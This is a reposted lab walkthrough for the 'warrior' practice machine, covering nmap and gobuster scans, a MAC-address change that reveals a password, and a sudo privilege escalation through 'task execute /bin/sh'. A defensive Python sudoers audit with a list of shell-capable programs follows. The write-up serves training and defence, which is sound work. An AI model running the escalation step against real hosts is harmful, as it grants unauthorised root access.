【OSCP】warrior

admin, June 24, 2024, 23:06:23

OSCP Lab

Lab Overview

warrior

easy

Information gathering, MAC address modification, privilege escalation via task

Information Gathering

Host Discovery

Port Scan

└─# nmap -sV -A -p- -T4 192.168.31.70 
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-15 03:13 EST
Nmap scan report for 192.168.31.70
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 25:16:8d:63:6b:75:f0:59:55:d4:b0:2d:75:8d:e0:e6 (RSA)
| 256 1e:29:d0:f4:c5:95:e7:40:30:2b:35:f7:a3:bc:36:75 (ECDSA)
|_ 256 cc:b1:52:b3:d7:ef:cd:73:4c:fc:f6:b5:51:77:ea:f3 (ED25519)
80/tcp open http nginx 1.18.0
| http-robots.txt: 7 disallowed entries
| /admin /secret.txt /uploads/id_rsa /internal.php
|_/internal /cms /user.txt
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0
MAC Address: 08:00:27:0C:35:AB (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Directory Scan

┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.31.70 -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.70
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.31.70/index.html (Status: 200) [Size: 31]
http://192.168.31.70/user.txt (Status: 200) [Size: 5]
http://192.168.31.70/admin (Status: 301) [Size: 169] [--> http://192.168.31.70/admin/]
http://192.168.31.70/robots.txt (Status: 200) [Size: 137]
http://192.168.31.70/internal.php (Status: 200) [Size: 82]
http://192.168.31.70/secret.txt (Status: 200) [Size: 17]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished

There is a hint here: the password only becomes visible after changing the MAC address.

sudo ifconfig eth1 down
sudo ifconfig eth1 hw ether 00:00:00:00:00:af
sudo ifconfig eth1 up
sudo service networking restart
ifconfig

After the change, visiting the page again reveals the password.

Gaining Access

Log in here with the bro account given in the hint.

Privilege Escalation

Use task to escalate to root privileges.

/usr/sbin/sudo /usr/bin/task execute /bin/sh
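
From the defender's side, the escalation above depends on a sudo rule that lets a low-privileged account run a program able to start other programs. The following Python audit is an added example, not part of the original post; the sample rules (including the one for bro) and the SHELL_CAPABLE list are constructed assumptions, and aliases and line continuations are not handled.

```python
import re

# Programs that can start arbitrary commands when allowed through sudo.
# "task" is the one used on this page; the rest are well-known examples only.
SHELL_CAPABLE = {"task", "vim", "find", "less", "awk", "env", "bash", "sh"}

RULE = re.compile(r"^(\S+)\s+\S+\s*=\s*(?:\(([^)]*)\)\s*)?(.+)$")
TAG = re.compile(r"^(NOPASSWD|PASSWD|NOEXEC|EXEC):\s*")
SKIP = ("#", "Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")

def audit_sudoers(text):
    """Return findings for rules that let a user run a shell-capable program."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith(SKIP):
            continue
        m = RULE.match(line)
        if not m:
            continue
        who, runas, cmds = m.group(1), m.group(2) or "root", m.group(3)
        tags = {"NOPASSWD": False, "NOEXEC": False}
        for cmd in (c.strip() for c in cmds.split(",")):
            # Tags apply to this command and carry over to the ones after it.
            while (t := TAG.match(cmd)):
                name = t.group(1)
                tags["NOPASSWD" if "PASSWD" in name else "NOEXEC"] = name.startswith("NO")
                cmd = cmd[t.end():]
            program = cmd.split()[0] if cmd else ""
            if program == "ALL" or program.rsplit("/", 1)[-1] in SHELL_CAPABLE:
                findings.append({"line": lineno, "who": who, "runas": runas,
                                 "command": cmd, "nopasswd": tags["NOPASSWD"],
                                 "noexec": tags["NOEXEC"]})
    return findings

# Constructed sample rules for illustration; not copied from the target host.
SAMPLE = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
bro ALL=(root) NOPASSWD: /usr/bin/task
backup ALL=(root) NOEXEC: /usr/bin/less /var/log/syslog, /usr/bin/du
%ops ALL=(root) /usr/sbin/service nginx reload
"""

if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE):
        print(finding)
```

A finding with `nopasswd` set and `noexec` unset, like the constructed bro rule, is the highest-priority one to remove or replace with a narrowly scoped wrapper.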

End

Originally published on the WeChat official account 贝雷帽SEC: 【OSCP】warrior

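  • This article was published on June 24, 2024, 23:06:23
  • When reposting, please keep the link to this article (CN-SEC中文网: thanks to the original author for the hard work):
                   【OSCP】warrior https://cn-sec.com/archives/2880562.html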